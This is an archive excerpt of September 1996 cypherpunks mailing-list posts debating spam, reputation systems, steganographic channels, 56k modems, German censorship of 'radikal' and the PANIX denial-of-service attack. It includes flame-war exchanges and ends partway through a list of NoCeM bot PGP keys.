"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 14 Sep 1996 08:28:05 +0800
To: Ross Wright <rwright@adnetsol.com>
Subject: Re: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
In-Reply-To: <199609122357.QAA24466@adnetsol.adnetsol.com>
Message-ID: <Pine.LNX.3.95.960913153653.710B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 12 Sep 1996, Ross Wright wrote:

> On Or About: 12 Sep 96 at 17:48, Rabid Wombat wrote:
> 
> > > 
> > > These people have invited the email, and the associated expense,
> > > by placing
> > > a public email-to: button on their public www page.
> 
> Correct!

By sending me unsolicited mail, you have invited the associated expense of
having every recipient bounce the message back to you (maybe sending a courtesy
copy to your postmaster).  If you don't want to wade through 20 megs of mail in
one day, don't send unsolicited email.  I hardly consider this abuse.  If you
have no ethical problem with sending people unsolicited junk to me, I have no
problem sending it right back to you indicating that I don't appreciate the
email.  Sounds fair to me.

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMjm43SzIPc7jvyFpAQHf/Qf/Y0r/pY3YAbW9RVw93ICX2Wk3/CepACBf
QHgw81+SWyes1d0QASR+Kp5bPTg3k6ZqiaqgZrZ7S/fN8h4p/Vb/md7ace6v90AM
Is+JU7cvntMa5NbbHSGKZD5noOllNodviLXMw0O+vgr1zv9vYTCJvE2KBwykmzVf
T3Sv5nKlsHAp2zK/aSZPPMqiq5pKQUZT2WlooviSsqCT6TAGLKJLpeQHufywNfM5
TYwY8g8Fd354h4Sa0nQS/a/IbDtpracr0K5eL7rVLyMNlTD8P17IOM1sdSL3ss38
0yt7WPv56xdkP3G8LvUeXAWUbsPUrAEjAT9gyklGMK89WxWcNnnOog==
=ILRH
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@suite.suite.com (Jim Miller)
Date: Sat, 14 Sep 1996 10:01:18 +0800
To: cypherpunks@toad.com
Subject: Re: really undetectable crypto
Message-ID: <9609132313.AA09496@suite.com>
MIME-Version: 1.0
Content-Type: text/plain



> Your assumptions are correct.  Applied Cryptography by
> Schneier discusses this method, referring to it as a
> "subliminal channel".

Why am I not surprised.  :-)


> Because of the very (VERY) slow transmission times (on
> the order of 1 bit/message), he notes it primarily as a
> secure method of exchanging keys. 

> 


I would think you could do better than 1 bit per message.  Using just  
hashes, I would think you could get at least 4-8 bits per message using a  
standard Pentium-class machine.  Maybe more, I haven't actually run any  
tests to see how long it would take to generate innocent messages that  
produces hashes with specific bits in certain positions.


> In his discussion, he also incorporated a bit in the
> signature, thus assuring the communication is
> travelling to the intended recipient unmolested.

I don't see why this is necessary.  If the hidden message is encrypted  
using a key (or key pair) known only to Alice and Bob, then Walter should  
not be able to fool Bob.  Walter could disrupt the communications in any  
number of ways, but he wouldn't be able to generate innocent messages that  
produce hashes that contain bits that combine to form a message encrypted  
using a key (or key pair) known only to Alice and Bob.


> However, to be "extremely sublime", your method could be
> incorporated with otherwise signed messages: while the
> signature appearing with your message includes an MD5
> hash, the real "stego bit" is the first bit of an RC4 hash of
> the same file, as computed by an external program on the
> receiver's end. 

> 


The above paragraph has given me an idea:  You don't need to send hashes  
or digital signatures to send hidden encrypted messages.  All Alice needs  
to send is the carefully constructed plaintext.  Bob can generate the  
hashes himself, extract the proper bits and attempt to decrypt the hidden  
message.  If the hidden message does not decrypt, then either the  
plaintext was tampered with, it was forged, or not all of the plaintext  
arrived.

That being the case, then I think we have a very simple proof that any  
communications channel, even one that allows only unsigned plaintext  
messages, can be used to send arbitrary encrypted messages (if a bit  
slowly).  So much for Clipper.

Jim_Miller@suite.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "hipcrime" <robert@precipice.v-site.net>
Date: Sat, 14 Sep 1996 09:59:24 +0800
To: <cypherpunks@toad.com>
Subject: Re: did you go to school?
Message-ID: <199609132320.QAA21103@dfw-ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



JMR, is everybody WRONG, who does not follow your line of
thinking??????????????

We just disagree, nobody's WRONG here.  

CypherWimps need, more than anything else, to get down off their
high-horses for once.

CyberSpace ain't Reality .  The reverse is true as well.


--HTTP://www.HIPCRIME.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <liberty@gate.net>
Date: Sat, 14 Sep 1996 08:20:22 +0800
To: remailer-operators@c2.org
Subject: Re: did you go to school?
Message-ID: <199609132109.RAA31614@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: robert@precipice.v-site.net, cypherpunks@toad.com,
 remailer-operators@c2.org
Date: Fri Sep 13 17:07:32 1996
"Hipcrime" Detweilled:

...

> JMR, it's hard to believe that your English education is SO LACKING,
> that you missed the fact, that in my sentence quoted above, the word 
> "ours" refers to MANKIND IN GENERAL, not me personally.
> 
> Go sit in the corner with the duncecap on, and don't come out until you
> can read an 8th grade piece of literature (with full comprehension).
> 

[This doesn't deserve comment, and I have already killfiled this 
asshole-liar-who-is-unable-to-admit-when-he's-wrong, but...]

1. Go run a remailer if you proclaim that you like them so much.

2. Private property that belongs to "mankind in general"? A new one on me. 
Webster's may help you understand English, but your debate skills are akin 
to your personality, and yes, once again, that was private email.
JMR  --  "who is beginning to get used to this from the net.jerk population.


Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"As govt.s grow arithmetically, corruption grows exponentially."
 -- Ray's Law of official corruption.

 Defeat the Duopoly!             Stop the Browne out.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/   http://www.twr.com/stbo
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
I will generate a new (and bigger) PGP key-pair on election night.
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjnNGm1lp8bpvW01AQFp/AP/UlGf+g56m/KjFOV6sTvD0+xTrAoQ9WFp
TThhZ9OLgQ2FQqEBJZ/vfGSUf7OxpYd5Q8cynLsnRXvH+9+z0XpzStC8KYyCuv5E
VFu10VeTs4egEX3dy6JSmFgZehJxDNsu/nVceTLmVX54JC+qMJ8hC7PPRZtvrSCy
LU8E9pWJMEY=
=8Cyf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Sat, 14 Sep 1996 03:20:05 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: "Unwanted Mail"
In-Reply-To: <ae5e0391020210044711@[207.167.93.63]>
Message-ID: <199609131727.RAA00191@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:
> But to attempt to define "SPAM" (unless you're Armour) is dangerous. This
> whole notion of "unwanted mail" is ill-defined and not something "the law"
> should get involved in, in my view. (And CP technologies certainly are
> consistent with this, e.g., placing the role of screening on those who set
> up gates, not on tracking down True Names for prosecution.)

I feel all "SPAM" related problems can be best addressed with a nice,
distributed reputation system which can hooked up with kill files etc.
Formal law is concerned with all kinds of physical and intellectual 
damages, and if SPAM can be categorised as physical/intellectual damage
then I see no reason why "the law" shouldn't interrupt. The problem
is that though the net believes in informal law, there is hardly any 
informal jurisdiction.  

- Vipul



-- 

Vipul Ved Prakash                 | - Electronic Security & Crypto 
vipul@pobox.com 	          | - Internet & Intranets 
91 11 2247802                     | - Web Development & PERL 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - (Networked) Multimedia





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 14 Sep 1996 08:49:56 +0800
To: cypherpunks@toad.com
Subject: NANDO: Backup Program
Message-ID: <01I9FSLFLT349ULPJS@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain



	Unfortunately, they're only using DES - probably because they do serve
international customers.

>     _________________________________________________________________
>   The Peanut Roaster
>     _________________________________________________________________
>                  HIAWATHA BRAY: ON-LINE BACKUP SAVES THE DAY
>   __________________________________________________________________________
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 The Boston Globe
      
[...]

>   (Sep 6, 1996 01:17 a.m. EDT) -- It's written in almost every computer
>   instruction manual and technical guide. It's encouraged, sometimes
>   even mandated, by MIS lords. Yet it's almost universally ignored.
   
[...]

>   Fortunately, just before the drive when south I had taken up an offer
>   from a company called Connected Corp., of Framingham, Mass., which
>   markets an appealing product called DataSafe.
   
[...]

>   DataSafe is an on-line data backup system. You load the DataSafe
>   software onto your computer then connect via the Internet to
>   Connected's data center. The system asks for a credit card number and
>   a password of your choosing. Once done, DataSafe searches your hard
>   drive, identifies every data file, and uploads them to the DataSafe
>   computer. The system doesn't back up your applications, such as your
>   copy of WordPerfect; just the data files you've created with the
>   software. DataSafe stashes your stuff in two separate computers to
>   ensure nothing is lost.
   
[...]

>   But a dead hard disk works wonders on one's powers of concentration.
>   With all my original data gone, it was time to find out whether this
>   DataSafe really worked. I reinstalled the DataSafe software onto my
>   new hard drive, made the connection with Connected, and waited to
>   receive my files. No dice. I'd forgotten the password. And Connected
>   refused to give it to me or provide me with a new one. That's because
>   the backed-up data is encrypted, and the password is the key. Even the
>   folks at Connected can't crack the encryption without your password.
>   They designed the system that way to reassure customers that nobody
>   can tamper with the data stored there.
   
[...]

>   But many, perhaps most, people can't afford to lose a fragment of
>   data. For them, on-line data backup systems like DataSafe may be the
>   answer. The company charges $14.95 a month to store 50 megabytes of
>   data. The software can be set to automatically back up all new and
>   modified files every day whenever you choose.

[...]
  
>   Businesses can use the system as an inexpensive data network. Just
>   create an account, then give the password to everybody in your
>   company. Now you can store commonly-used files on the backup server,
>   where they can be downloaded by anyone who needs them.
   
>   Connected isn't the only company that has figured this out. MCI Corp.
>   is selling an Internet-based data backup service. So is McAfee
>   Associates, the maker of anti-virus software. Many people will
>   hesitate to store their computer files with a stranger, encryption or
>   no encryption. But if that makes you uneasy, imagine how you'd feel if
>   your hard disk crashed. Unless you're a columnist, it could be a
>   disaster.
   
>   (Hiawatha Bray is a member of the Globe staff. You can send him
>   electronic mail at Bray@globe.com.)
   
[...]

>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 14 Sep 1996 08:48:34 +0800
To: cypherpunks@toad.com
Subject: NANDO: Radikal
Message-ID: <01I9FSS1YYRO9ULPJS@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain



	I've sent (using wURLd Presence) the URLs of some of the mirror sites
to several search engines.
	-Allen

>     _________________________________________________________________
>   The Peanut Roaster
>     _________________________________________________________________
>              GERMANS PROBE COMPUTER FIRMS OVER ELECTRONIC PAPER
>   __________________________________________________________________________
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 Reuter Information Service
      
>   BONN (Sep 13, 1996 4:05 p.m. EDT) - Germany's Federal Prosecutor's
>   Office said on Friday it was investigating a number of so-called
>   Internet providers because they were giving computer subscribers
>   access to a radical left-wing electronic newspaper.
   
>   A spokesman for the office said the firms were suspected of inciting
>   criminal activity and advertising for a terrorist group because they
>   had failed to block access to the left-wing Internet page "radikal
>   154."
   
>   Among other things, the electronic site provides instructions on how
>   to sabotage railway lines. Prosecutors consider it to be terrorist
>   propaganda.
   
>   On Friday, the page was still available via major Internet providers
>   CompuServe Inc, AOL and T-Online, the online service of
>   telecommunications giant Deutsche Telekom.
   
>   AOL said in a statement that it was technically impossible to block
>   the server where "radikal" originated, and that the page was anyway
>   now available via at least 30 other servers and in thousands of
>   electronic copies.
   
>   Authorities have been getting increasingly frustrated that radical
>   left- or right-wing material whose distribution is a criminal offence
>   in Germany can be picked up here on the Internet from computers in
>   foreign countries. The server where "radikal" originates is located in
>   the Netherlands.

Chuckle...
   
>   Firms giving access to the Internet -- a network of interlinked
>   computers providing access to millions of electronic pages -- say they
>   are no more responsible for the contents than a telephone company is
>   for the conversations it carries.
   
>   On Thursday Germany's office for the protection of juveniles for the
>   first time put an Internet page -- produced in North America by
>   leading Nazi apologist Ernst Zuendel -- on its list of banned
>   publications.
   
>   But officials conceded that the move was likely to have little
>   practical effect, and provider T-Online said it had no intention of
>   blocking the page.

[...]   

>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 14 Sep 1996 12:23:06 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: Internet Drivers' Licenses
Message-ID: <199609140150.SAA09043@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> writes:

 > I'm crushed.

 > Seriously, what is the import of the "real identifiable
 > human" or the "posting under their legal names" point?

It's been a bad spam day.  If someone offered me a switch that
would separate academicians from AOLers, I would throw it.

That doesn't necessarily mean I would leave it in the "ON"
position forever, or that I would consider such a thing to be the
correct Cypherpunks approach to the problem.

 > If an AI program posts quality stuff, what's the difference?

 > Why the import of true "legal" names?  Why not simply
 > develop reputation signatures?

 > The concept that "legal names" are some how a credential is
 > silly.  I have a friend who has four, with matching SSN
 > cards.

These are all good points, but today (as opposed to days when I
am in a good mood, and think correct political thoughts), I would
opt for the quick and dirty solution.

 > What your suggestion basically says is "instead of
 > developing our own decentralized reputations system for
 > filtering lets use one already in place, i.e. the state
 > Department of Motor Vehicles.

Let's develop our own decentralized reputations system for
filtering.  Could we have it installed in the "sci" and "comp"
hierarchies by tomorrow morning please?

 > Mr. Duvos' idea is, in my view, a step backwards.

Mr. Duvos, like other humans with Net fatigue, is occasionally
not in good humour.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sat, 14 Sep 1996 12:19:05 +0800
To: Asgaard <cypherpunks@toad.com
Subject: Re: 56 kbps modems
Message-ID: <ae5fbdf9040210046851@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 5:09 AM 9/13/96, Asgaard wrote:
>>U.S. Robotics and Rockwell International are planning new modems with
>>speeds up to 56 kbps a second, almost double the speed of the fastest
>>rate now available.  The new devices should be available by the end of
>>the year, although their top speed initially may be less than 56 kbps.
>>(Wall Street Journal 12 Sep 96 B11)
>
>People who seemed to know used to say that 'the Shannon limit'
>set an absolute upper limit around 40 kbps. Has Shannon been
>proven wrong, or what?
>
>Asgaard

I imagine that both modems in a connection become phase locked with the
underlying 8K digital carrier. Then each modem signal element is carried by
just one 8 bit digital sample. That carrier moves 8 bit bytes 8000 times
per second. Stopping at 56 Kb instead of 64Kb means that a 7 bit DA
converter for the sending modem and a 7 bit AD converter in the receiver,
plus some fancy analog filters to undo the subscriber loop effects. Going
for 64Kb would require twice the signal to noise ratio on the local loops.

I think that modern PBXs have a digital link to the phone company. This
would mean that an ISP would not have to buy fancy modems. A modified PBX
could transmit and receive bits to a computer directly. It will impact the
phone compnany's ISDN service but I don't think that they can stop this.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Sat, 14 Sep 1996 06:25:02 +0800
To: cypherpunks@toad.com
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <199609130114.VAA08507@jekyll.piermont.com>
Message-ID: <Pine.HPP.3.91.960913174948.12376B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Sep 1996, Perry E. Metzger wrote:

> Yes, we could be a workers paradise like one of those lovely European
> countries with double digit unemployment and all. Too bad we didn't go
> in for democratic socialism while we could have, eh?

If I were an unskilled person I would rather live in one of these
countries where I would be paid approximately the same for doing
nothing as for selling burgers at Mac Donalds. The low rate of
unemployment in the US is partly due to the creation of service
jobs with a salary that would be 'illegal' according to European
union agreements. Now, the situation is that I have some wanted
skills and pay a lot of taxes to support those who have none, and
who are not permitted to work for lower than minimum wages. From a
pure egotistical viewpoint I really should join the present calls
for, as the debate goes here in Sweden, transforming the enemployed
into 'maids and servants'. But I don't. I think it would backlash;
the 'lower classes' would come back at us and cut our throats
eventually (say, when 70% are serving the remaining 30%).

With the present rate of increase in world population the planet
will go to hell anyway. But suppose the population problem could
be fixed. Then, with technology escalating towards singularity,
machines doing almost all labor, there could certainly exist a
system where the 'dumb' and 'lazy' could be fed and housed properly
without anybody complaining. Those who want to become maids and
servants for some extra pocket money, well, good luck to them.
But to force people into menial service jobs just to literally
survive is not to my taste. No, give them minimal shelter for
nothing and from there on let the market anarcho-capitalistic
struggle begin, for obtaining a higher than minimum material
standard or reputational standing.

But I get as angry as any libertarian when my tax money goes
to subsidizing obsolete eduction, 'culture' and endless hordes
of bureaucrats, when all we need is some basic police, courts
and the Minimal Ministry for Collection of Taxes (probably
based on production of some physical goods rather than income)
for Redistribution to the Police, Courts and Everyone - yes,
of course everyone should receive the minimal support-without-
work and be able to rise from there.


Asgaard

P.S.  Mac Donalds could easily be replaced by a bot.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 14 Sep 1996 09:53:31 +0800
To: HipCrime <robert@precipice.V-site.net>
Subject: Re: did you go to school?
In-Reply-To: <32399315.19E7@precipice.v-site.net>
Message-ID: <Pine.SUN.3.94.960913190544.27451C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Sep 1996, HipCrime wrote:

> >>               THIN SLICES CUT FROM OUR PRECIOUS FORESTS.
> >
> > "OUR?" Since when did my trees become partially yours?
> > JMR
> 
> JMR, it's hard to believe that your English education is SO LACKING,
> that you missed the fact, that in my sentence quoted above, the word 
> "ours" refers to MANKIND IN GENERAL, not me personally.
> 
> Go sit in the corner with the duncecap on, and don't come out until you
> can read an 8th grade piece of literature (with full comprehension).
> 
> -- HTTP://www.HIPCRIME.com
> 

Look, I really thing it would be in everyone's best interest if you just
leave the list and ignore any e-mail from list members for a while.  It
will save you, and everyone a good deal of time.

Your repeated replies are THIN SLICES CUT FROM OUR PRECIOUS BANDWIDTH.

(Note that I have placed your address in my mail filter and thus will not
be replying to your reply).

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William Ehrendreich" <bille@metro.net>
Date: Sat, 14 Sep 1996 10:54:33 +0800
To: "Enzo Michelangeli" <asgaard@Cor.sos.sll.se>
Subject: Re: 56 kbps modems
Message-ID: <00230911403893@metro.net>
MIME-Version: 1.0
Content-Type: text/plain


Yeah... and besides that ... if your local telco has lifted your load coils
then you have a much better chance!

----------
> From: Enzo Michelangeli <enzo@ima.com>
> To: Asgaard <asgaard@Cor.sos.sll.se>
> Cc: cypherpunks@toad.com
> Subject: Re: 56 kbps modems
> Date: Friday, September 13, 1996 10:24 AM
> 
> On Fri, 13 Sep 1996, Asgaard wrote:
> 
> > >U.S. Robotics and Rockwell International are planning new modems with
> > >speeds up to 56 kbps a second, almost double the speed of the fastest
> > >rate now available.  The new devices should be available by the end of
> > >the year, although their top speed initially may be less than 56 kbps.
> > >(Wall Street Journal 12 Sep 96 B11)
> > 
> > People who seemed to know used to say that 'the Shannon limit'
> > set an absolute upper limit around 40 kbps. Has Shannon been
> > proven wrong, or what?
> 
> Well, it all depends on the signal-to-noise ratio. Also, if the noise is
> not white gaussian the situation can be even better.
> 
> Enzo
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Sat, 14 Sep 1996 11:35:23 +0800
To: cypherpunks@toad.com
Subject: unwanted mail..what can I do?
Message-ID: <960913194609_522174372@emout17.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I recieved mail from netfree.com..
I tried mailing it back (it def. had a forged address, but I got the netfree
from the mail header.....)
So anyway..... I tried sending to root@netfree....my mail was rejected (not
unknown ...it was rejected by the system) said it wasnt authorized... so I
tried support@netfree...same thing. 
It ISSSSS rather annoying...any sugestions?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ddfr@best.com (david friedman)
Date: Sat, 14 Sep 1996 13:17:38 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <v02130500ae5f55a1a71e@[205.149.171.135]>
MIME-Version: 1.0
Content-Type: text/plain


>     If they were teaching anything, I bet the kid _would_ sit still.
>I sure would have been a lot less distracted.

Or, as Adam Smith put it:

"but after twelve or thirteen years of age, provided the master does his
duty, force or restraint can scarce ever be necessary to carry on any part
of education."

and

"No discipline is ever requisite to force attendance upon lectures which
are really worth the attending, as is well known wherever such lectures are
given."

David Friedman

P.S. sorry to be so late--I just came across this post.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 14 Sep 1996 11:28:35 +0800
To: cypherpunks@toad.com
Subject: Re: PANIX.COM down: denial of service attack
In-Reply-To: <3.0b15.32.19960913111921.00b03180@mail.teleport.com>
Message-ID: <07y8TD6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen <alano@teleport.com> writes:

> At 10:13 AM 9/13/96 -0400, pjb@ny.ubs.com wrote:
> >> "As to who might be targeting Panix, the firm's Mr. Rosen speculated it
> >   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> >
> >It could, of course, also be someone, from a set of several million, that
> >find Mr. Rosen to be such as odious prick that they did it just to drive him
> >out of their misery. Just thinking out loud..
>
> Or it could be any of the readers of 2600 (which published an article on
> SYN floods in the last issue).

Come ON, folks. I've met Alexis. I don't like many things he does, and
I'm sick and tired of the shitty Usenet feed he gives me :-), but he's
much less of an "odious prick" than practically any other ISP owner, large
or small. If anyone was looking for an "odious prick" to harrass, they'd
probably start with Barry Schein of world.std.com.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 14 Sep 1996 11:02:59 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: Re: Internet Drivers' Licenses
In-Reply-To: <199609132026.NAA15888@netcom9.netcom.com>
Message-ID: <Pine.SUN.3.94.960913202014.2637A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Sep 1996, Mike Duvos wrote:

> Bill Stewart writes:
> 
> > Anybody for an Internet Driver's License?

[Too much spam, some designed to avoid filtering by humans or machines]

> Just being able to filter out posts from Net addresses that
> don't correspond to real identifiable humans posting under
> their legal names would be a good first step.  

I'm crushed.

Seriously, what is the import of the "real identifiable human" or the
"posting under their legal names" point?

If an AI program posts quality stuff, what's the difference?

Why the import of true "legal" names?  Why not simply develop reputation
signatures?

The concept that "legal names" are some how a credential is silly.  I have
a friend who has four, with matching SSN cards.

What your suggestion basically says is "instead of developing our own
decentralized reputations system for filtering lets use one already in
place, i.e. the state Department of Motor Vehicles.

Of course the problem is that you have to rely on the "Is a person"
judgment of the DMV which amounts to the education and judgment of the
$21k a year "administrative assistant" who stands at the door looking at
"birth certificates" and deciding whether to let people in.  Not only is
the reputation of such a system questionable, the system is centralized,
easily fooled by anyone with a dose of creativity, and hampered by
corruption and institutional disinformation (witness relocation,
government alteration, etc.).

In any event, getting reputation credentials from a decentralized "web of
trust" is a much more efficient answer, especially where you can assign
your own levels of trust to each signator.

Mr. Duvos' idea is, in my view, a step backwards.

> --
>      Mike Duvos         $    PGP 2.6 Public Key available     $
>      mpd@netcom.com     $    via Finger.                      $

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 14 Sep 1996 12:15:08 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Drivers' Licenses
In-Reply-To: <199609132026.NAA15888@netcom9.netcom.com>
Message-ID: <mLZ8TD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


mpd@netcom.com (Mike Duvos) writes:
> At this point, I would love the ability to filter news and mail
> according to some criteria related to the sender's probable
> reputation.  Back in the early days of C&S, spam was an
> intellectual issue.  Now it is a good chunk of the entire
> bandwidth of major components of the Net.

No it's not. Look at the size of the spam reported on a week in
news.admin.net-abuse.announce. Divide it by the total Usenet traffic
in a week. Tell us what you get.

> I am now getting more junk email than email from people I
> care to correspond with.  It seems one can't even read the
> scholarly newsgroups anymore without "Come Watch Us Lick
> Ourselves on the Web" messages popping up regularly.

Have you looked at NoCeM notices?

If the "Lick my Pussy Cheap" article is multi-posted more than
15 times, then the CancelMoose[tm] will post a NoCeM notice for
it in alt.nocem.misc. (A big 8 newsgroup may be created eventually.)
If you use decent newsreading software, you can instruct it to
look at the NoCeM notices and mark the inappropriate articles as
being already read, so you won't see them. Look at CM's homepage
at http://www.cm.org for more information about NoCeM's.

Some people, including myself, issue NoCeM notices for articles
in certain newsgroup which aren't multi-posted, but are nevertheless
off-topic. Here are the PGP signatures for the 'bots I run:

Type bits/keyID    Date       User ID
pub  1024/7BECC7F1 1996/08/08 <alt.revenge-NoCeMbot@bwalk.dm.com>
pub  1024/F1CB011D 1996/03/16 <misc.jobs.misc-NoCeMbot@bwalk.dm.com>
pub  1024/5BEC22E5 1996/08/08 <nyc.food-NoCeMbot@bwalk.dm.com>
pub  1024/FDF03179 1996/08/09 <nyc.general-NoCeMbot@bwalk.dm.com>
pub  1024/6396A13D 1996/08/08 <nyc.seminars-NoCeMbot@bwalk.dm.com>
pub  1024/B1E05325 1996/08/08 <rec.humor-NoCeMbot@bwalk.dm.com>
pub  1024/946493D5 1996/08/08 <sci.math-NoCeMbot@bwalk.dm.com>
pub  1024/FEBCB511 1996/08/08 <sci.physics-NoCeMbot@bwalk.dm.com>

Public key for <alt.revenge-NoCeMbot@bwalk.dm.com>:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAzIJ2+4AAAEEAL0WxIcWypgl7EFfVmJSfSCGmWTuzEaMHvbPxdyN1lm4Dum3
M9DVk8fqaPWLqEjqXOJ700Op3Dl/jXoYbv38tXpwaZ/Z769gXFHnEJOkX1m1PqCo
0Sq5naPauhIt6cpaminvfourqwbWjDmDWn7/1T5K4V4yehEnj1UsIER77MfxAAUR
tCM8YWx0LnJldmVuZ2UtTm9DZU1ib3RAYndhbGsuZG0uY29tPg==
=B5BZ
-----END PGP PUBLIC KEY BLOCK-----

Public key for <misc.jobs.misc-NoCeMbot@bwalk.dm.com>:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAzFLAe4AAAEEAOLyLxMchegiEnjrf39JnpoO3UiEf7PelgOgbDAWafnj2cQV
HfhBWJZDsCekCBi64Wu6YsoF/hY6QkA5QwQ7O7ZXB89chBIdOeJIlFFo9qq4LWRX
vlQzcSDvt93f2S+HHCjQCYS0C1N+hS1FcseJnmRYBtAKsqwVFRkXW//xywEdAAUR
tCY8bWlzYy5qb2JzLm1pc2MtTm9DZU1ib3RAYndhbGsuZG0uY29tPg==
=SG3Y
-----END PGP PUBLIC KEY BLOCK-----

Public key for <nyc.food-NoCeMbot@bwalk.dm.com>:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAzIJ6M4AAAEEAL4+AoiMaQnGJfm868jVi9Ol97Fz002PKepBUwEJJzGxm91K
MbF/TC977/vMZlaXIp2JYD4+v0nfweb17cWtPcqhXQaHStCvvjVu96NGgajcsm7u
lJeoag7bsEwcvG3WgGyEXcYCsWLl7/YAl41bhWFGI1j++BzAT2WekuVb7CLlAAUR
tCA8bnljLmZvb2QtTm9DZU1ib3RAYndhbGsuZG0uY29tPg==
=PQxj
-----END PGP PUBLIC KEY BLOCK-----

Public key for <nyc.general-NoCeMbot@bwalk.dm.com>:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAzIKhHIAAAEEAKzBmAsBxOBg5bsCsSlIbe1uhQFBYP7sFS1t0xQHEOQRfp3K
bGBoxkVPp/lHaOya+TALwLC45/b4aqCwPIiXftcp1/U1e9xBhac5AhCtjJK+1itQ
vK9qZswPpikUm/1r//3gbXgaR8dVbgU72Sd2z6ddoqu3MLvTAWq10JL98DF5AAUR
tCM8bnljLmdlbmVyYWwtTm9DZU1ib3RAYndhbGsuZG0uY29tPg==
=oMRH
-----END PGP PUBLIC KEY BLOCK-----

Public key for <nyc.seminars-NoCeMbot@bwalk.dm.com>:


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

